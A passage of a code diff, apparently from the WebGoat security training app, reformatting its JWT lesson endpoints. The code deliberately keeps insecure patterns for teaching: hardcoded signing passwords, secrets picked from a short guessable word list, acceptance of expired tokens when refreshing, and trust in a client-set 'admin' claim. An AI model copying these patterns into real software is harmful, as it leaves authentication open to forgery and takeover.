+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTQuiz.java
@@ -8,42 +8,41 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-
 @RestController
 public class JWTQuiz extends AssignmentEndpoint {
 
-    private final String[] solutions = {"Solution 1", "Solution 2"};
-    private final boolean[] guesses = new boolean[solutions.length];
+  private final String[] solutions = {"Solution 1", "Solution 2"};
+  private final boolean[] guesses = new boolean[solutions.length];
 
-    @PostMapping("/JWT/quiz")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String[] question_0_solution, @RequestParam String[] question_1_solution) {
-        int correctAnswers = 0;
+  @PostMapping("/JWT/quiz")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String[] question_0_solution, @RequestParam String[] question_1_solution) {
+    int correctAnswers = 0;
 
-        String[] givenAnswers = {question_0_solution[0], question_1_solution[0]};
+    String[] givenAnswers = {question_0_solution[0], question_1_solution[0]};
 
-        for (int i = 0; i < solutions.length; i++) {
-            if (givenAnswers[i].contains(solutions[i])) {
-                // answer correct
-                correctAnswers++;
-                guesses[i] = true;
-            } else {
-                // answer incorrect
-                guesses[i] = false;
-            }
-        }
-
-        if (correctAnswers == solutions.length) {
-            return success(this).build();
-        } else {
-            return failed(this).build();
-        }
+    for (int i = 0; i < solutions.length; i++) {
+      if (givenAnswers[i].contains(solutions[i])) {
+        // answer correct
+        correctAnswers++;
+        guesses[i] = true;
+      } else {
+        // answer incorrect
+        guesses[i] = false;
+      }
     }
 
-    @GetMapping("/JWT/quiz")
-    @ResponseBody
-    public boolean[] getResults() {
-        return this.guesses;
+    if (correctAnswers == solutions.length) {
+      return success(this).build();
+    } else {
+      return failed(this).build();
     }
+  }
 
+  @GetMapping("/JWT/quiz")
+  @ResponseBody
+  public boolean[] getResults() {
+    return this.guesses;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpoint.java
index 675dcd449..945bb57da 100644
--- a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpoint.java
@@ -22,12 +22,20 @@
 
 package org.owasp.webgoat.lessons.jwt;
 
+import static org.springframework.http.ResponseEntity.ok;
+
 import io.jsonwebtoken.Claims;
 import io.jsonwebtoken.ExpiredJwtException;
 import io.jsonwebtoken.Header;
 import io.jsonwebtoken.Jwt;
 import io.jsonwebtoken.JwtException;
 import io.jsonwebtoken.Jwts;
+import java.util.ArrayList;
+import java.util.Date;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
+import java.util.concurrent.TimeUnit;
 import org.apache.commons.lang3.RandomStringUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -41,106 +49,109 @@ import org.springframework.web.bind.annotation.RequestHeader;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.ArrayList;
-import java.util.Date;
-import java.util.HashMap;
-import java.util.List;
-import java.util.Map;
-import java.util.concurrent.TimeUnit;
-
-import static org.springframework.http.ResponseEntity.ok;
-
 /**
  * @author nbaars
  * @since 4/23/17.
  */
 @RestController
-@AssignmentHints({"jwt-refresh-hint1", "jwt-refresh-hint2", "jwt-refresh-hint3", "jwt-refresh-hint4"})
+@AssignmentHints({
+  "jwt-refresh-hint1",
+  "jwt-refresh-hint2",
+  "jwt-refresh-hint3",
+  "jwt-refresh-hint4"
+})
 public class JWTRefreshEndpoint extends AssignmentEndpoint {
 
-    public static final String PASSWORD = "bm5nhSkxCXZkKRy4";
-    private static final String JWT_PASSWORD = "bm5n3SkxCX4kKRy4";
-    private static final List<String> validRefreshTokens = new ArrayList<>();
+  public static final String PASSWORD = "bm5nhSkxCXZkKRy4";
+  private static final String JWT_PASSWORD = "bm5n3SkxCX4kKRy4";
+  private static final List<String> validRefreshTokens = new ArrayList<>();
 
-    @PostMapping(value = "/JWT/refresh/login", consumes = MediaType.APPLICATION_JSON_VALUE, produces = MediaType.APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public ResponseEntity follow(@RequestBody(required = false) Map<String, Object> json) {
-        if (json == null) {
-            return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
-        }
-        String user = (String) json.get("user");
-        String password = (String) json.get("password");
+  @PostMapping(
+      value = "/JWT/refresh/login",
+      consumes = MediaType.APPLICATION_JSON_VALUE,
+      produces = MediaType.APPLICATION_JSON_VALUE)
+  @ResponseBody
+  public ResponseEntity follow(@RequestBody(required = false) Map<String, Object> json) {
+    if (json == null) {
+      return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
+    }
+    String user = (String) json.get("user");
+    String password = (String) json.get("password");
 
-        if ("Jerry".equalsIgnoreCase(user) && PASSWORD.equals(password)) {
-            return ok(createNewTokens(user));
-        }
-        return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
+    if ("Jerry".equalsIgnoreCase(user) && PASSWORD.equals(password)) {
+      return ok(createNewTokens(user));
+    }
+    return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
+  }
+
+  private Map<String, Object> createNewTokens(String user) {
+    Map<String, Object> claims = new HashMap<>();
+    claims.put("admin", "false");
+    claims.put("user", user);
+    String token =
+        Jwts.builder()
+            .setIssuedAt(new Date(System.currentTimeMillis() + TimeUnit.DAYS.toDays(10)))
+            .setClaims(claims)
+            .signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, JWT_PASSWORD)
+            .compact();
+    Map<String, Object> tokenJson = new HashMap<>();
+    String refreshToken = RandomStringUtils.randomAlphabetic(20);
+    validRefreshTokens.add(refreshToken);
+    tokenJson.put("access_token", token);
+    tokenJson.put("refresh_token", refreshToken);
+    return tokenJson;
+  }
+
+  @PostMapping("/JWT/refresh/checkout")
+  @ResponseBody
+  public ResponseEntity<AttackResult> checkout(
+      @RequestHeader(value = "Authorization", required = false) String token) {
+    if (token == null) {
+      return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
+    }
+    try {
+      Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(token.replace("Bearer ", ""));
+      Claims claims = (Claims) jwt.getBody();
+      String user = (String) claims.get("user");
+      if ("Tom".equals(user)) {
+        return ok(success(this).build());
+      }
+      return ok(failed(this).feedback("jwt-refresh-not-tom").feedbackArgs(user).build());
+    } catch (ExpiredJwtException e) {
+      return ok(failed(this).output(e.getMessage()).build());
+    } catch (JwtException e) {
+      return ok(failed(this).feedback("jwt-invalid-token").build());
+    }
+  }
+
+  @PostMapping("/JWT/refresh/newToken")
+  @ResponseBody
+  public ResponseEntity newToken(
+      @RequestHeader(value = "Authorization", required = false) String token,
+      @RequestBody(required = false) Map<String, Object> json) {
+    if (token == null || json == null) {
+      return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
     }
 
-    private Map<String, Object> createNewTokens(String user) {
-        Map<String, Object> claims = new HashMap<>();
-        claims.put("admin", "false");
-        claims.put("user", user);
-        String token = Jwts.builder()
-                .setIssuedAt(new Date(System.currentTimeMillis() + TimeUnit.DAYS.toDays(10)))
-                .setClaims(claims)
-                .signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, JWT_PASSWORD)
-                .compact();
-        Map<String, Object> tokenJson = new HashMap<>();
-        String refreshToken = RandomStringUtils.randomAlphabetic(20);
-        validRefreshTokens.add(refreshToken);
-        tokenJson.put("access_token", token);
-        tokenJson.put("refresh_token", refreshToken);
-        return tokenJson;
+    String user;
+    String refreshToken;
+    try {
+      Jwt<Header, Claims> jwt =
+          Jwts.parser().setSigningKey(JWT_PASSWORD).parse(token.replace("Bearer ", ""));
+      user = (String) jwt.getBody().get("user");
+      refreshToken = (String) json.get("refresh_token");
+    } catch (ExpiredJwtException e) {
+      user = (String) e.getClaims().get("user");
+      refreshToken = (String) json.get("refresh_token");
     }
 
-    @PostMapping("/JWT/refresh/checkout")
-    @ResponseBody
-    public ResponseEntity<AttackResult> checkout(@RequestHeader(value = "Authorization", required = false) String token) {
-        if (token == null) {
-            return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
-        }
-        try {
-            Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(token.replace("Bearer ", ""));
-            Claims claims = (Claims) jwt.getBody();
-            String user = (String) claims.get("user");
-            if ("Tom".equals(user)) {
-                return ok(success(this).build());
-            }
-            return ok(failed(this).feedback("jwt-refresh-not-tom").feedbackArgs(user).build());
-        } catch (ExpiredJwtException e) {
-            return ok(failed(this).output(e.getMessage()).build());
-        } catch (JwtException e) {
-            return ok(failed(this).feedback("jwt-invalid-token").build());
-        }
-    }
-
-    @PostMapping("/JWT/refresh/newToken")
-    @ResponseBody
-    public ResponseEntity newToken(@RequestHeader(value = "Authorization", required = false) String token,
-                                   @RequestBody(required = false) Map<String, Object> json) {
-        if (token == null || json == null) {
-            return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
-        }
-
-        String user;
-        String refreshToken;
-        try {
-            Jwt<Header, Claims> jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(token.replace("Bearer ", ""));
-            user = (String) jwt.getBody().get("user");
-            refreshToken = (String) json.get("refresh_token");
-        } catch (ExpiredJwtException e) {
-            user = (String) e.getClaims().get("user");
-            refreshToken = (String) json.get("refresh_token");
-        }
-
-        if (user == null || refreshToken == null) {
-            return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
-        } else if (validRefreshTokens.contains(refreshToken)) {
-            validRefreshTokens.remove(refreshToken);
-            return ok(createNewTokens(user));
-        } else {
-            return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
-        }
+    if (user == null || refreshToken == null) {
+      return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
+    } else if (validRefreshTokens.contains(refreshToken)) {
+      validRefreshTokens.remove(refreshToken);
+      return ok(createNewTokens(user));
+    } else {
+      return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpoint.java
index affa09cf1..dac1ef5cc 100644
--- a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpoint.java
@@ -27,6 +27,11 @@ import io.jsonwebtoken.Jwt;
 import io.jsonwebtoken.Jwts;
 import io.jsonwebtoken.SignatureAlgorithm;
 import io.jsonwebtoken.impl.TextCodec;
+import java.time.Instant;
+import java.util.Calendar;
+import java.util.Date;
+import java.util.List;
+import java.util.Random;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -37,12 +42,6 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.time.Instant;
-import java.util.Calendar;
-import java.util.Date;
-import java.util.List;
-import java.util.Random;
-
 /**
  * @author nbaars
  * @since 4/23/17.
@@ -51,45 +50,50 @@ import java.util.Random;
 @AssignmentHints({"jwt-secret-hint1", "jwt-secret-hint2", "jwt-secret-hint3"})
 public class JWTSecretKeyEndpoint extends AssignmentEndpoint {
 
-    public static final String[] SECRETS = {"victory", "business", "available", "shipping", "washington"};
-    public static final String JWT_SECRET = TextCodec.BASE64.encode(SECRETS[new Random().nextInt(SECRETS.length)]);
-    private static final String WEBGOAT_USER = "WebGoat";
-    private static final List<String> expectedClaims = List.of("iss", "iat", "exp", "aud", "sub", "username", "Email", "Role");
+  public static final String[] SECRETS = {
+    "victory", "business", "available", "shipping", "washington"
+  };
+  public static final String JWT_SECRET =
+      TextCodec.BASE64.encode(SECRETS[new Random().nextInt(SECRETS.length)]);
+  private static final String WEBGOAT_USER = "WebGoat";
+  private static final List<String> expectedClaims =
+      List.of("iss", "iat", "exp", "aud", "sub", "username", "Email", "Role");
 
-    @RequestMapping(path = "/JWT/secret/gettoken", produces = MediaType.TEXT_HTML_VALUE)
-    @ResponseBody
-    public String getSecretToken() {
-        return Jwts.builder()
-                .setIssuer("WebGoat Token Builder")
-                .setAudience("webgoat.org")
-                .setIssuedAt(Calendar.getInstance().getTime())
-                .setExpiration(Date.from(Instant.now().plusSeconds(60)))
-                .setSubject("tom@webgoat.org")
-                .claim("username", "Tom")
-                .claim("Email", "tom@webgoat.org")
-                .claim("Role", new String[]{"Manager", "Project Administrator"})
-                .signWith(SignatureAlgorithm.HS256, JWT_SECRET).compact();
-    }
+  @RequestMapping(path = "/JWT/secret/gettoken", produces = MediaType.TEXT_HTML_VALUE)
+  @ResponseBody
+  public String getSecretToken() {
+    return Jwts.builder()
+        .setIssuer("WebGoat Token Builder")
+        .setAudience("webgoat.org")
+        .setIssuedAt(Calendar.getInstance().getTime())
+        .setExpiration(Date.from(Instant.now().plusSeconds(60)))
+        .setSubject("tom@webgoat.org")
+        .claim("username", "Tom")
+        .claim("Email", "tom@webgoat.org")
+        .claim("Role", new String[] {"Manager", "Project Administrator"})
+        .signWith(SignatureAlgorithm.HS256, JWT_SECRET)
+        .compact();
+  }
 
-    @PostMapping("/JWT/secret")
-    @ResponseBody
-    public AttackResult login(@RequestParam String token) {
-        try {
-            Jwt jwt = Jwts.parser().setSigningKey(JWT_SECRET).parseClaimsJws(token);
-            Claims claims = (Claims) jwt.getBody();
-            if (!claims.keySet().containsAll(expectedClaims)) {
-                return failed(this).feedback("jwt-secret-claims-missing").build();
-            } else {
-                String user = (String) claims.get("username");
+  @PostMapping("/JWT/secret")
+  @ResponseBody
+  public AttackResult login(@RequestParam String token) {
+    try {
+      Jwt jwt = Jwts.parser().setSigningKey(JWT_SECRET).parseClaimsJws(token);
+      Claims claims = (Claims) jwt.getBody();
+      if (!claims.keySet().containsAll(expectedClaims)) {
+        return failed(this).feedback("jwt-secret-claims-missing").build();
+      } else {
+        String user = (String) claims.get("username");
 
-                if (WEBGOAT_USER.equalsIgnoreCase(user)) {
-                    return success(this).build();
-                } else {
-                    return failed(this).feedback("jwt-secret-incorrect-user").feedbackArgs(user).build();
-                }
-            }
-        } catch (Exception e) {
-            return failed(this).feedback("jwt-invalid-token").output(e.getMessage()).build();
+        if (WEBGOAT_USER.equalsIgnoreCase(user)) {
+          return success(this).build();
+        } else {
+          return failed(this).feedback("jwt-secret-incorrect-user").feedbackArgs(user).build();
         }
+      }
+    } catch (Exception e) {
+      return failed(this).feedback("jwt-invalid-token").output(e.getMessage()).build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpoint.java
index c0afdb69f..632449822 100644
--- a/src/main/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpoint.java
@@ -22,11 +22,23 @@
 
 package org.owasp.webgoat.lessons.jwt;
 
+import static java.util.Comparator.comparingLong;
+import static java.util.Optional.ofNullable;
+import static java.util.stream.Collectors.toList;
+
 import io.jsonwebtoken.Claims;
 import io.jsonwebtoken.Jwt;
 import io.jsonwebtoken.JwtException;
 import io.jsonwebtoken.Jwts;
 import io.jsonwebtoken.impl.TextCodec;
+import java.time.Duration;
+import java.time.Instant;
+import java.util.Date;
+import java.util.HashMap;
+import java.util.Map;
+import javax.annotation.PostConstruct;
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletResponse;
 import org.apache.commons.lang3.StringUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -46,139 +58,164 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.ResponseStatus;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.annotation.PostConstruct;
-import javax.servlet.http.Cookie;
-import javax.servlet.http.HttpServletResponse;
-import java.time.Duration;
-import java.time.Instant;
-import java.util.Date;
-import java.util.HashMap;
-import java.util.Map;
-
-import static java.util.Comparator.comparingLong;
-import static java.util.Optional.ofNullable;
-import static java.util.stream.Collectors.toList;
-
 /**
  * @author nbaars
  * @since 4/23/17.
  */
 @RestController
-@AssignmentHints({"jwt-change-token-hint1", "jwt-change-token-hint2", "jwt-change-token-hint3", "jwt-change-token-hint4", "jwt-change-token-hint5"})
+@AssignmentHints({
+  "jwt-change-token-hint1",
+  "jwt-change-token-hint2",
+  "jwt-change-token-hint3",
+  "jwt-change-token-hint4",
+  "jwt-change-token-hint5"
+})
 public class JWTVotesEndpoint extends AssignmentEndpoint {
 
-    public static final String JWT_PASSWORD = TextCodec.BASE64.encode("victory");
-    private static String validUsers = "TomJerrySylvester";
+  public static final String JWT_PASSWORD = TextCodec.BASE64.encode("victory");
+  private static String validUsers = "TomJerrySylvester";
 
-    private static int totalVotes = 38929;
-    private Map<String, Vote> votes = new HashMap<>();
+  private static int totalVotes = 38929;
+  private Map<String, Vote> votes = new HashMap<>();
 
-    @PostConstruct
-    public void initVotes() {
-        votes.put("Admin lost password", new Vote("Admin lost password",
-                "In this challenge you will need to help the admin and find the password in order to login",
-                "challenge1-small.png", "challenge1.png", 36000, totalVotes));
-        votes.put("Vote for your favourite",
-                new Vote("Vote for your favourite",
-                        "In this challenge ...",
-                        "challenge5-small.png", "challenge5.png", 30000, totalVotes));
-        votes.put("Get it for free",
-                new Vote("Get it for free",
-                        "The objective for this challenge is to buy a Samsung phone for free.",
-                        "challenge2-small.png", "challenge2.png", 20000, totalVotes));
-        votes.put("Photo comments",
-                new Vote("Photo comments",
-                        "n this challenge you can comment on the photo you will need to find the flag somewhere.",
-                        "challenge3-small.png", "challenge3.png", 10000, totalVotes));
+  @PostConstruct
+  public void initVotes() {
+    votes.put(
+        "Admin lost password",
+        new Vote(
+            "Admin lost password",
+            "In this challenge you will need to help the admin and find the password in order to"
+                + " login",
+            "challenge1-small.png",
+            "challenge1.png",
+            36000,
+            totalVotes));
+    votes.put(
+        "Vote for your favourite",
+        new Vote(
+            "Vote for your favourite",
+            "In this challenge ...",
+            "challenge5-small.png",
+            "challenge5.png",
+            30000,
+            totalVotes));
+    votes.put(
+        "Get it for free",
+        new Vote(
+            "Get it for free",
+            "The objective for this challenge is to buy a Samsung phone for free.",
+            "challenge2-small.png",
+            "challenge2.png",
+            20000,
+            totalVotes));
+    votes.put(
+        "Photo comments",
+        new Vote(
+            "Photo comments",
+            "n this challenge you can comment on the photo you will need to find the flag"
+                + " somewhere.",
+            "challenge3-small.png",
+            "challenge3.png",
+            10000,
+            totalVotes));
+  }
+
+  @GetMapping("/JWT/votings/login")
+  public void login(@RequestParam("user") String user, HttpServletResponse response) {
+    if (validUsers.contains(user)) {
+      Claims claims = Jwts.claims().setIssuedAt(Date.from(Instant.now().plus(Duration.ofDays(10))));
+      claims.put("admin", "false");
+      claims.put("user", user);
+      String token =
+          Jwts.builder()
+              .setClaims(claims)
+              .signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, JWT_PASSWORD)
+              .compact();
+      Cookie cookie = new Cookie("access_token", token);
+      response.addCookie(cookie);
+      response.setStatus(HttpStatus.OK.value());
+      response.setContentType(MediaType.APPLICATION_JSON_VALUE);
+    } else {
+      Cookie cookie = new Cookie("access_token", "");
+      response.addCookie(cookie);
+      response.setStatus(HttpStatus.UNAUTHORIZED.value());
+      response.setContentType(MediaType.APPLICATION_JSON_VALUE);
     }
+  }
 
-    @GetMapping("/JWT/votings/login")
-    public void login(@RequestParam("user") String user, HttpServletResponse response) {
-        if (validUsers.contains(user)) {
-            Claims claims = Jwts.claims().setIssuedAt(Date.from(Instant.now().plus(Duration.ofDays(10))));
-            claims.put("admin", "false");
-            claims.put("user", user);
-            String token = Jwts.builder()
-                    .setClaims(claims)
-                    .signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, JWT_PASSWORD)
-                    .compact();
-            Cookie cookie = new Cookie("access_token", token);
-            response.addCookie(cookie);
-            response.setStatus(HttpStatus.OK.value());
-            response.setContentType(MediaType.APPLICATION_JSON_VALUE);
+  @GetMapping("/JWT/votings")
+  @ResponseBody
+  public MappingJacksonValue getVotes(
+      @CookieValue(value = "access_token", required = false) String accessToken) {
+    MappingJacksonValue value =
+        new MappingJacksonValue(
+            votes.values().stream()
+                .sorted(comparingLong(Vote::getAverage).reversed())
+                .collect(toList()));
+    if (StringUtils.isEmpty(accessToken)) {
+      value.setSerializationView(Views.GuestView.class);
+    } else {
+      try {
+        Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(accessToken);
+        Claims claims = (Claims) jwt.getBody();
+        String user = (String) claims.get("user");
+        if ("Guest".equals(user) || !validUsers.contains(user)) {
+          value.setSerializationView(Views.GuestView.class);
         } else {
-            Cookie cookie = new Cookie("access_token", "");
-            response.addCookie(cookie);
-            response.setStatus(HttpStatus.UNAUTHORIZED.value());
-            response.setContentType(MediaType.APPLICATION_JSON_VALUE);
+          value.setSerializationView(Views.UserView.class);
         }
+      } catch (JwtException e) {
+        value.setSerializationView(Views.GuestView.class);
+      }
     }
+    return value;
+  }
 
-    @GetMapping("/JWT/votings")
-    @ResponseBody
-    public MappingJacksonValue getVotes(@CookieValue(value = "access_token", required = false) String accessToken) {
-        MappingJacksonValue value = new MappingJacksonValue(votes.values().stream().sorted(comparingLong(Vote::getAverage).reversed()).collect(toList()));
-        if (StringUtils.isEmpty(accessToken)) {
-            value.setSerializationView(Views.GuestView.class);
+  @PostMapping(value = "/JWT/votings/{title}")
+  @ResponseBody
+  @ResponseStatus(HttpStatus.ACCEPTED)
+  public ResponseEntity<?> vote(
+      @PathVariable String title,
+      @CookieValue(value = "access_token", required = false) String accessToken) {
+    if (StringUtils.isEmpty(accessToken)) {
+      return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
+    } else {
+      try {
+        Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(accessToken);
+        Claims claims = (Claims) jwt.getBody();
+        String user = (String) claims.get("user");
+        if (!validUsers.contains(user)) {
+          return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
         } else {
-            try {
-                Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(accessToken);
-                Claims claims = (Claims) jwt.getBody();
-                String user = (String) claims.get("user");
-                if ("Guest".equals(user) || !validUsers.contains(user)) {
-                    value.setSerializationView(Views.GuestView.class);
-                } else {
-                    value.setSerializationView(Views.UserView.class);
-                }
-            } catch (JwtException e) {
-                value.setSerializationView(Views.GuestView.class);
-            }
+          ofNullable(votes.get(title)).ifPresent(v -> v.incrementNumberOfVotes(totalVotes));
+          return ResponseEntity.accepted().build();
         }
-        return value;
+      } catch (JwtException e) {
+        return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
+      }
     }
+  }
 
-    @PostMapping(value = "/JWT/votings/{title}")
-    @ResponseBody
-    @ResponseStatus(HttpStatus.ACCEPTED)
-    public ResponseEntity<?> vote(@PathVariable String title, @CookieValue(value = "access_token", required = false) String accessToken) {
-        if (StringUtils.isEmpty(accessToken)) {
-            return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
+  @PostMapping("/JWT/votings")
+  @ResponseBody
+  public AttackResult resetVotes(
+      @CookieValue(value = "access_token", required = false) String accessToken) {
+    if (StringUtils.isEmpty(accessToken)) {
+      return failed(this).feedback("jwt-invalid-token").build();
+    } else {
+      try {
+        Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(accessToken);
+        Claims claims = (Claims) jwt.getBody();
+        boolean isAdmin = Boolean.valueOf(String.valueOf(claims.get("admin")));
+        if (!isAdmin) {
+          return failed(this).feedback("jwt-only-admin").build();
         } else {
-            try {
-                Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(accessToken);
-                Claims claims = (Claims) jwt.getBody();
-                String user = (String) claims.get("user");
-                if (!validUsers.contains(user)) {
-                    return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
-                } else {
-                    ofNullable(votes.get(title)).ifPresent(v -> v.incrementNumberOfVotes(totalVotes));
-                    return ResponseEntity.accepted().build();
-                }
-            } catch (JwtException e) {
-                return ResponseEntity.status(HttpStatus.UNAUTHORIZED).build();
-            }
-        }
-    }
-
-    @PostMapping("/JWT/votings")
-    @ResponseBody
-    public AttackResult resetVotes(@CookieValue(value = "access_token", required = false) String accessToken) {
-        if (StringUtils.isEmpty(accessToken)) {
-            return failed(this).feedback("jwt-invalid-token").build();
-        } else {
-            try {
-                Jwt jwt = Jwts.parser().setSigningKey(JWT_PASSWORD).parse(accessToken);
-                Claims claims = (Claims) jwt.getBody();
-                boolean isAdmin = Boolean.valueOf(String.valueOf(claims.get("admin")));
-                if (!isAdmin) {
-                    return failed(this).feedback("jwt-only-admin").build();
-                } else {
-                    votes.values().forEach(vote -> vote.reset());
-                    return success(this).build();
-                }
-            } catch (JwtException e) {
-                return failed(this).feedback("jwt-invalid-token").output(e.toString()).build();
-            }
+          votes.values().forEach(vote -> vote.reset());
+          return success(this).build();
         }
+      } catch (JwtException e) {
+        return failed(this).feedback("jwt-invalid-token").output(e.toString()).build();
+      }
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/jwt/votes/Views.java b/src/main/java/org/owasp/webgoat/lessons/jwt/votes/Views.java
index ced070830..cc600318c 100644
--- a/src/main/java/org/owasp/webgoat/lessons/jwt/votes/Views.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/votes/Views.java
@@ -5,9 +5,7 @@ package org.owasp.webgoat.lessons.jwt.votes;
  * @since 4/30/17.
  */
 public class Views {
-    public interface GuestView {
-    }
+  public interface GuestView {}
 
-    public interface UserView extends GuestView {
-    }
+  public interface UserView extends GuestView {}
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/jwt/votes/Vote.java b/src/main/java/org/owasp/webgoat/lessons/jwt/votes/Vote.java
index 5e82bb362..2d065df53 100644
--- a/src/main/java/org/owasp/webgoat/lessons/jwt/votes/Vote.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/votes/Vote.java
@@ -31,42 +31,53 @@ import lombok.Getter;
  */
 @Getter
 public class Vote {
-    @JsonView(Views.GuestView.class)
-    private final String title;
-    @JsonView(Views.GuestView.class)
-    private final String information;
-    @JsonView(Views.GuestView.class)
-    private final String imageSmall;
-    @JsonView(Views.GuestView.class)
-    private final String imageBig;
-    @JsonView(Views.UserView.class)
-    private int numberOfVotes;
-    @JsonView(Views.UserView.class)
-    private boolean votingAllowed = true;
-    @JsonView(Views.UserView.class)
-    private long average = 0;
+  @JsonView(Views.GuestView.class)
+  private final String title;
 
+  @JsonView(Views.GuestView.class)
+  private final String information;
 
-    public Vote(String title, String information, String imageSmall, String imageBig, int numberOfVotes, int totalVotes) {
-        this.title = title;
-        this.information = information;
-        this.imageSmall = imageSmall;
-        this.imageBig = imageBig;
-        this.numberOfVotes = numberOfVotes;
-        this.average = calculateStars(totalVotes);
-    }
+  @JsonView(Views.GuestView.class)
+  private final String imageSmall;
 
-    public void incrementNumberOfVotes(int totalVotes) {
-        this.numberOfVotes = this.numberOfVotes + 1;
-        this.average = calculateStars(totalVotes);
-    }
+  @JsonView(Views.GuestView.class)
+  private final String imageBig;
 
-    public void reset() {
-        this.numberOfVotes = 1;
-        this.average = 1;
-    }
+  @JsonView(Views.UserView.class)
+  private int numberOfVotes;
 
-    private long calculateStars(int totalVotes) {
-        return Math.round(((double) numberOfVotes / (double) totalVotes) * 4);
-    }
+  @JsonView(Views.UserView.class)
+  private boolean votingAllowed = true;
+
+  @JsonView(Views.UserView.class)
+  private long average = 0;
+
+  public Vote(
+      String title,
+      String information,
+      String imageSmall,
+      String imageBig,
+      int numberOfVotes,
+      int totalVotes) {
+    this.title = title;
+    this.information = information;
+    this.imageSmall = imageSmall;
+    this.imageBig = imageBig;
+    this.numberOfVotes = numberOfVotes;
+    this.average = calculateStars(totalVotes);
+  }
+
+  public void incrementNumberOfVotes(int totalVotes) {
+    this.numberOfVotes = this.numberOfVotes + 1;
+    this.average = calculateStars(totalVotes);
+  }
+
+  public void reset() {
+    this.numberOfVotes = 1;
+    this.average = 1;
+  }
+
+  private long calculateStars(int totalVotes) {
+    return Math.round(((double) numberOfVotes / (double) totalVotes) * 4);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/lessontemplate/LessonTemplate.java b/src/main/java/org/owasp/webgoat/lessons/lessontemplate/LessonTemplate.java
index 9d6024cb8..20fd1f293 100644
--- a/src/main/java/org/owasp/webgoat/lessons/lessontemplate/LessonTemplate.java
+++ b/src/main/java/org/owasp/webgoat/lessons/lessontemplate/LessonTemplate.java
@@ -29,13 +29,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class LessonTemplate extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.GENERAL;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.GENERAL;
+  }
 
-    @Override
-    public String getTitle() {
-        return "lesson-template.title";
-    }
+  @Override
+  public String getTitle() {
+    return "lesson-template.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/lessontemplate/SampleAttack.java b/src/main/java/org/owasp/webgoat/lessons/lessontemplate/SampleAttack.java
index 8bdfabd17..22a028490 100644
